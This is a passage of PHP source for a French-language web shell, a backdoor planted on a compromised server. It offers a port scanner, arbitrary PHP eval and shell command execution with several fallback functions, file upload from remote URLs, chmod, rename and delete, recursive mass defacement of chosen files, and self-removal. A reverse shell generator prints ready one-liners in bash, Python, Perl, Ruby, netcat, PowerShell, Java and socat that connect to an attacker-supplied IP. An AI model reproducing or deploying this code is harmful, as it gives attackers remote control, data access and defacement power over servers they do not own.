echo '<label>Timeout (sec): <input type="text" name="ps_timeout" value="'.(@$_POST['ps_timeout']?:'1').'"></label>';
echo '<input type="submit" name="portscan" value="🔌 Scanner">';
echo '</form>';
if (isset($_POST['portscan'])) {
echo '<div class="terminal-output">';
$host = $_POST['ps_host'];
$timeout = (float)$_POST['ps_timeout'];
$portsStr = $_POST['ps_ports'];
$ports = [];
if (strpos($portsStr, '-') !== false) {
list($start, $end) = explode('-', $portsStr);
$ports = range((int)$start, (int)$end);
} else {
$ports = array_map('intval', explode(',', $portsStr));
}
echo "Scanning $host...\n";
foreach ($ports as $port) {
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
if ($fp) {
$service = @getservbyport($port, 'tcp') ?: 'unknown';
echo '<span class="success">PORT '.$port.' OPEN ('.$service.')</span>'."\n";
@fclose($fp);
}
}
echo "\nScan terminé.\n";
echo '</div>';
}
break;
// ========== REVERSE SHELL ==========
case 'reverseshell':
echo '<h3>🔄 Reverse Shell Generator</h3>';
echo '<form method="post"><input type="hidden" name="action" value="reverseshell">';
echo '<label>IP: <input type="text" name="rs_ip" value="'.@$_POST['rs_ip'].'"></label>';
echo '<label>Port: <input type="text" name="rs_port" value="'.(@$_POST['rs_port']?:'4444').'"></label>';
echo '<input type="submit" name="genrevshell" value="🔄 Générer">';
echo '</form>';
if (isset($_POST['genrevshell'])) {
$ip = htmlspecialchars($_POST['rs_ip']);
$port = (int)$_POST['rs_port'];
echo '<h4>Reverse Shells:</h4>';
$shells = [
'Bash' => "bash -i >& /dev/tcp/$ip/$port 0>&1",
'Bash (alt)' => "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'",
'Python' => "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
'Python3' => "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
'PHP' => "php -r '\$sock=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
'Perl' => "perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
'Ruby' => "ruby -rsocket -e'f=TCPSocket.open(\"$ip\",$port).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
'Netcat' => "nc -e /bin/sh $ip $port",
'Netcat (no -e)' => "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f",
'PowerShell' => "\$client = New-Object System.Net.Sockets.TCPClient('$ip',$port);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};",
'Java' => "Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/$ip/$port;cat <&5 | while read line; do \$line 2>&5 >&5; done\"});p.waitFor();",
'Socat' => "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$ip:$port",
];
foreach ($shells as $name => $cmd) {
echo '<h5 style="color:'.$config['accent'].';margin-top:10px">'.$name.':</h5>';
echo '<div class="terminal-output" style="min-height:0">'.htmlspecialchars($cmd).'</div>';
}
echo '<h5 style="color:'.$config['accent'].';margin-top:15px">Listener (votre machine):</h5>';
echo '<div class="terminal-output" style="min-height:0">nc -lvnp '.$port.'</div>';
}
break;
// ========== HASH TOOLS ==========
case 'hasher':
echo '<h3>🔐 Hash Tools</h3>';
echo '<div class="grid-2"><div>';
echo '<h4>Hasher</h4>';
echo '<form method="post"><input type="hidden" name="action" value="hasher">';
echo '<label>Texte: <input type="text" name="hash_text" value="'.htmlspecialchars(@$_POST['hash_text']).'"></label>';
echo '<input type="submit" name="dohash" value="🔐 Hash">';
echo '</form>';
if (isset($_POST['dohash']) && $_POST['hash_text']) {
$t = $_POST['hash_text'];
echo '<div class="terminal-output">';
echo "MD5: ".md5($t)."\n";
echo "SHA1: ".sha1($t)."\n";
echo "SHA256: ".hash('sha256', $t)."\n";
echo "SHA512: ".hash('sha512', $t)."\n";
echo "CRC32: ".hash('crc32', $t)."\n";
echo "Whirlpool:".hash('whirlpool', $t)."\n";
echo "Base64: ".base64_encode($t)."\n";
echo "ROT13: ".str_rot13($t)."\n";
echo "URL Enc: ".urlencode($t)."\n";
echo '</div>';
}
echo '</div><div>';
echo '<h4>Hash Identifier</h4>';
echo '<form method="post"><input type="hidden" name="action" value="hasher">';
echo '<label>Hash: <input type="text" name="id_hash" value="'.htmlspecialchars(@$_POST['id_hash']).'"></label>';
echo '<input type="submit" name="idhash" value="🔍 Identifier">';
echo '</form>';
if (isset($_POST['idhash']) && $_POST['id_hash']) {
$h = trim($_POST['id_hash']);
$len = strlen($h);
echo '<div class="terminal-output">';
echo "Longueur: $len caractères\n";
$types = [];
if ($len == 32 && ctype_xdigit($h)) $types[] = 'MD5';
if ($len == 40 && ctype_xdigit($h)) $types[] = 'SHA1';
if ($len == 64 && ctype_xdigit($h)) $types[] = 'SHA256';
if ($len == 128 && ctype_xdigit($h)) $types[] = 'SHA512';
if ($len == 56 && ctype_xdigit($h)) $types[] = 'SHA224';
if ($len == 96 && ctype_xdigit($h)) $types[] = 'SHA384';
if (preg_match('/^\$2[ayb]\$.{56}$/', $h)) $types[] = 'BCrypt';
if (preg_match('/^\$1\$/', $h)) $types[] = 'MD5 Crypt';
if (preg_match('/^\$5\$/', $h)) $types[] = 'SHA256 Crypt';
if (preg_match('/^\$6\$/', $h)) $types[] = 'SHA512 Crypt';
echo "Types possibles: " . (empty($types) ? 'Inconnu' : implode(', ', $types)) . "\n";
echo '</div>';
}
echo '</div></div>';
break;
// ========== STRING TOOLS ==========
case 'stringtools':
echo '<h3>🔤 String Tools</h3>';
echo '<form method="post"><input type="hidden" name="action" value="stringtools">';
echo '<textarea name="st_input" rows="6" placeholder="Entrez du texte...">'.htmlspecialchars(@$_POST['st_input']).'</textarea>';
echo '<div style="margin:10px 0">';
$ops = ['base64_encode'=>'Base64 Encode','base64_decode'=>'Base64 Decode',
'urlencode'=>'URL Encode','urldecode'=>'URL Decode',
'rot13'=>'ROT13','hex_encode'=>'Hex Encode','hex_decode'=>'Hex Decode',
'reverse'=>'Reverse','upper'=>'Uppercase','lower'=>'Lowercase',
'htmlencode'=>'HTML Encode','htmldecode'=>'HTML Decode'];
foreach ($ops as $k => $v) {
echo '<input type="submit" name="st_op" value="'.$v.'">';
}
echo '</div></form>';
if (isset($_POST['st_op']) && isset($_POST['st_input'])) {
$in = $_POST['st_input'];
$op = $_POST['st_op'];
$out = '';
switch ($op) {
case 'Base64 Encode': $out = base64_encode($in); break;
case 'Base64 Decode': $out = base64_decode($in); break;
case 'URL Encode': $out = urlencode($in); break;
case 'URL Decode': $out = urldecode($in); break;
case 'ROT13': $out = str_rot13($in); break;
case 'Hex Encode': $out = bin2hex($in); break;
case 'Hex Decode': $out = @hex2bin($in); break;
case 'Reverse': $out = strrev($in); break;
case 'Uppercase': $out = strtoupper($in); break;
case 'Lowercase': $out = strtolower($in); break;
case 'HTML Encode': $out = htmlspecialchars($in); break;
case 'HTML Decode': $out = html_entity_decode($in); break;
}
echo '<h4>Résultat ('.$op.'):</h4>';
echo '<div class="terminal-output">'.htmlspecialchars($out).'</div>';
}
break;
// ========== PHP EVAL ==========
case 'eval':
echo '<h3>▶️ PHP Eval</h3>';
echo '<form method="post"><input type="hidden" name="action" value="eval">';
echo '<textarea name="eval_code" rows="10" placeholder="// Code PHP sans les tags <?php ?>">'.htmlspecialchars(@$_POST['eval_code']).'</textarea>';
echo '<input type="submit" name="doeval" value="▶ Exécuter">';
echo '</form>';
if (isset($_POST['doeval']) && $_POST['eval_code']) {
echo '<div class="terminal-output">';
ob_start();
@eval($_POST['eval_code']);
echo htmlspecialchars(ob_get_clean());
echo '</div>';
}
break;
// ========== CHMOD ==========
case 'chmod':
$file = isset($_GET['file']) ? $_GET['file'] : '';
echo '<h3>🔒 Changer les permissions</h3>';
echo '<form method="post"><input type="hidden" name="action" value="dochmod">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<label>Fichier: <input type="text" name="chmod_file" value="'.htmlspecialchars($file).'"></label>';
echo '<label>Permissions (ex: 0755): <input type="text" name="chmod_perm" value="0'.decoct(@fileperms($file) & 0777).'"></label>';
echo '<input type="submit" value="🔒 Appliquer">';
echo '</form>';
break;
// ========== RENAME ==========
case 'rename':
$file = isset($_GET['file']) ? $_GET['file'] : '';
echo '<h3>✏️ Renommer</h3>';
echo '<form method="post"><input type="hidden" name="action" value="dorename">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<label>Ancien nom: <input type="text" name="old_name" value="'.htmlspecialchars($file).'"></label>';
echo '<label>Nouveau nom: <input type="text" name="new_name" value="'.htmlspecialchars($file).'"></label>';
echo '<input type="submit" value="✏️ Renommer">';
echo '</form>';
break;
// ========== SELF REMOVE ==========
case 'selfremove':
echo '<h3>🗑 Auto-suppression</h3>';
echo '<p class="warning">⚠️ Cette action va supprimer ce script du serveur.</p>';
echo '<form method="post"><input type="hidden" name="action" value="doselfremove">';
echo '<input type="submit" value="🗑 Confirmer la suppression" style="background:#f00">';
echo '</form>';
break;
default:
renderFileManager($cwd);
}
?>
</div>
<div style="text-align:center;padding:15px;color:#555;font-size:11px;border-top:1px solid #1a1a4e;margin-top:20px">
<?= $config['shell_name'] ?> | PHP <?= phpversion() ?> | <?= php_uname('s').' '.php_uname('r') ?> | <?= date('Y-m-d H:i:s') ?>
</div>
</div>
</body>
</html>
<?php
// ==========================================
// FONCTIONS
// ==========================================
function showLogin($config) {
?>
<!DOCTYPE html>
<html><head><title>Login</title>
<style>
body{background:<?=$config['theme_color']?>;display:flex;justify-content:center;align-items:center;height:100vh;font-family:'Courier New',monospace}
.login-box{background:#16213e;padding:40px;border:1px solid <?=$config['accent']?>;text-align:center}
h2{color:<?=$config['accent']?>;margin-bottom:20px}
input[type=password]{background:#0a0a23;color:#eee;border:1px solid #333;padding:10px;width:200px;font-family:'Courier New'}
input[type=submit]{background:<?=$config['accent']?>;color:#fff;border:none;padding:10px 20px;cursor:pointer;font-family:'Courier New';margin-top:10px}
</style></head><body>
<div class="login-box">
<h2>⚡ <?=$config['shell_name']?></h2>
<form method="post"><input type="password" name="login_password" placeholder="Mot de passe..." autofocus><br>
<input type="submit" value="Connexion"></form></div></body></html>
<?php
}
function executeCommand($cmd, $cwd = '/tmp') {
$output = '';
if (function_exists('exec')) {
@exec('cd '.escapeshellarg($cwd).' && '.$cmd.' 2>&1', $arr);
$output = implode("\n", $arr);
} elseif (function_exists('shell_exec')) {
$output = @shell_exec('cd '.escapeshellarg($cwd).' && '.$cmd.' 2>&1');
} elseif (function_exists('system')) {
ob_start();
@system('cd '.escapeshellarg($cwd).' && '.$cmd.' 2>&1');
$output = ob_get_clean();
} elseif (function_exists('passthru')) {
ob_start();
@passthru('cd '.escapeshellarg($cwd).' && '.$cmd.' 2>&1');
$output = ob_get_clean();
} elseif (function_exists('popen')) {
$h = @popen('cd '.escapeshellarg($cwd).' && '.$cmd.' 2>&1', 'r');
if ($h) { while (!feof($h)) $output .= fread($h, 4096); pclose($h); }
} elseif (function_exists('proc_open')) {
$desc = [0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];
$proc = @proc_open($cmd, $desc, $pipes, $cwd);
if (is_resource($proc)) {
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]);
proc_close($proc);
}
} else {
$output = 'Aucune fonction d\'exécution disponible.';
}
return $output;
}
function formatSize($size) {
if ($size === false || $size === null) return 'N/A';
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
$i = 0;
while ($size >= 1024 && $i < 4) { $size /= 1024; $i++; }
return round($size, 2) . ' ' . $units[$i];
}
function formatPerms($perms) {
$info = '';
// Type
if (($perms & 0xC000) == 0xC000) $info = 's';
elseif (($perms & 0xA000) == 0xA000) $info = 'l';
elseif (($perms & 0x8000) == 0x8000) $info = '-';
elseif (($perms & 0x6000) == 0x6000) $info = 'b';
elseif (($perms & 0x4000) == 0x4000) $info = 'd';
elseif (($perms & 0x2000) == 0x2000) $info = 'c';
elseif (($perms & 0x1000) == 0x1000) $info = 'p';
else $info = 'u';
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
// Other
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function renderFileManager($cwd) {
global $config;
// Nouveau dossier
echo '<div class="flex-row" style="margin-bottom:10px">';
echo '<form method="post" style="display:inline-flex;gap:5px">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<input type="text" name="newdir" placeholder="Nouveau dossier" style="width:200px">';
echo '<input type="submit" name="mkdir" value="📁 Créer dossier">';
echo '</form>';
echo '<form method="post" style="display:inline-flex;gap:5px">';
echo '<input type="hidden" name="dir" value="'.htmlspecialchars($cwd).'">';
echo '<input type="text" name="newfile" placeholder="Nouveau fichier" style="width:200px">';
echo '<input type="submit" name="mkfile" value="📄 Créer fichier">';
echo '</form>';
echo '<form method="get" style="display:inline-flex;gap:5px">';
echo '<input type="hidden" name="action" value="filemanager">';
echo '<input type="text" name="dir" placeholder="Aller à..." value="'.htmlspecialchars($cwd).'" style="width:300px">';
echo '<input type="submit" value="📂 Aller">';
echo '</form>';
echo '</div>';
$items = @scandir($cwd);
if ($items === false) {
echo '<p class="error">❌ Impossible de lire ce répertoire.</p>';
return;
}
// Tri: dossiers d'abord
$dirs = $files = [];
foreach ($items as $item) {
if ($item == '.') continue;
$fullpath = $cwd . DIRECTORY_SEPARATOR . $item;
if (is_dir($fullpath)) $dirs[] = $item;
else $files[] = $item;
}
sort($dirs); sort($files);
echo '<div style="overflow-x:auto"><table>';
echo '<tr><th>Type</th><th>Nom</th><th>Taille</th><th>Permissions</th><th>Owner/Group</th><th>Modifié</th><th>Actions</th></tr>';
foreach (array_merge($dirs, $files) as $item) {
$fullpath = $cwd . DIRECTORY_SEPARATOR . $item;
$isDir = is_dir($fullpath);
$perms = @fileperms($fullpath);
$owner = function_exists('posix_getpwuid') ? @posix_getpwuid(@fileowner($fullpath)) : null;
$group = function_exists('posix_getgrgid') ? @posix_getgrgid(@filegroup($fullpath)) : null;
echo '<tr>';
echo '<td>'.($isDir ? '<span class="dir-icon">📁</span>' : '<span class="file-icon">📄</span>').'</td>';
if ($isDir) {
echo '<td><a href="?action=filemanager&dir='.urlencode(realpath($fullpath)).'">'
.htmlspecialchars($item).'</a></td>';
echo '<td>DIR</td>';
} else {
echo '<td><a href="?action=view&file='.urlencode($fullpath).'&dir='.urlencode($cwd).'">'
.htmlspecialchars($item).'</a></td>';
echo '<td class="size-col">'.formatSize(@filesize($fullpath)).'</td>';
}
$permStr = formatPerms($perms);
echo '<td><span title="'.decoct($perms & 0777).'">'.$permStr.'</span></td>';
echo '<td>'.($owner ? $owner['name'] : @fileowner($fullpath)).'/'.($group ? $group['name'] : @filegroup($fullpath)).'</td>';
echo '<td>'.date('Y-m-d H:i', @filemtime($fullpath)).'</td>';
echo '<td class="actions">';
if (!$isDir) {
echo '<a href="?action=edit&file='.urlencode($fullpath).'&dir='.urlencode($cwd).'" title="Edit">📝</a>';
echo '<a href="?action=download&file='.urlencode($fullpath).'" title="Download">📥</a>';
echo '<a href="?action=view&file='.urlencode($fullpath).'&dir='.urlencode($cwd).'" title="View">👁</a>';
}
echo '<a href="?action=rename&file='.urlencode($fullpath).'&dir='.urlencode($cwd).'" title="Rename">✏️</a>';
echo '<a href="?action=chmod&file='.urlencode($fullpath).'&dir='.urlencode($cwd).'" title="Chmod">🔒</a>';
echo '<a href="?action=delete&file='.urlencode($fullpath).'&dir='.urlencode($cwd).'" title="Delete" onclick="return confirm(\'Supprimer '.htmlspecialchars($item).' ?\')">🗑</a>';
echo '</td></tr>';
}
echo '</table></div>';
echo '<p style="margin-top:10px;color:#888">'.count($dirs).' dossiers, '.count($files).' fichiers</p>';
}
function massDeface($path, $target, $content, &$count) {
$dir = @opendir($path);
if (!$dir) return;
while (($file = readdir($dir)) !== false) {
if ($file == '.' || $file == '..') continue;
$full = $path . '/' . $file;
if (is_dir($full)) {
massDeface($full, $target, $content, $count);
} elseif ($file == $target) {
if (@file_put_contents($full, $content)) {
echo '<span class="success">✅ '.htmlspecialchars($full).'</span>'."\n";
$count++;
} else {
echo '<span class="error">❌ '.htmlspecialchars($full).'</span>'."\n";
}
}
}
closedir($dir);
}
function handlePostActions($cwd) {
// Upload fichier
if (isset($_POST['action']) && $_POST['action'] == 'doupload' && isset($_FILES['uploadfile'])) {
$dest = $_POST['uploadpath'];
for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
if ($_FILES['uploadfile']['error'][$i] == 0) {
$target = $dest . '/' . $_FILES['uploadfile']['name'][$i];
move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target);
}
}
}
// Upload URL
if (isset($_POST['action']) && $_POST['action'] == 'urlupload' && isset($_POST['url'])) {
$content = @file_get_contents($_POST['url']);
if ($content === false && function_exists('curl_init')) {
$ch = curl_init($_POST['url']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
}
if ($content !== false) {
$fname = $_POST['urlfilename'] ?: basename(parse_url($_POST['url'], PHP_URL_PATH));
@file_put_contents($_POST['urlpath'] . '/' . $fname, $content);
}
}
// Créer fichier
if (isset($_POST['action']) && $_POST['action'] == 'createfile') {
@file_put_contents($cwd . '/' . $_POST['newfilename'], $_POST['newfilecontent']);
}
// Mkdir
if (isset($_POST['mkdir']) && $_POST['newdir']) {
@mkdir($cwd . '/' . $_POST['newdir'], 0755);
}
// Mkfile
if (isset($_POST['mkfile']) && $_POST['newfile']) {
@file_put_contents($cwd . '/' . $_POST['newfile'], '');
}
// Delete
if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['file'])) {
$file = $_GET['file'];
if (is_dir($file)) {
@rmdir($file);
if (is_dir($file)) @executeCommand('rm -rf '.escapeshellarg($file), $cwd);
} else {
@unlink($file);
}
}
// Chmod
if (isset($_POST['action']) && $_POST['action'] == 'dochmod') {
@chmod($_POST['chmod_file'], octdec($_POST['chmod_perm']));
}
// Rename
if (isset($_POST['action']) && $_POST['action'] == 'dorename') {
@rename($_POST['old_name'], $_POST['new_name']);
}
// Self remove
if (isset($_POST['action']) && $_POST['action'] == 'doselfremove') {
@unlink(__FILE__);
die('<h1 style="color:red;text-align:center;margin-top:50px">Shell supprimé.</h1>');
}
}
?>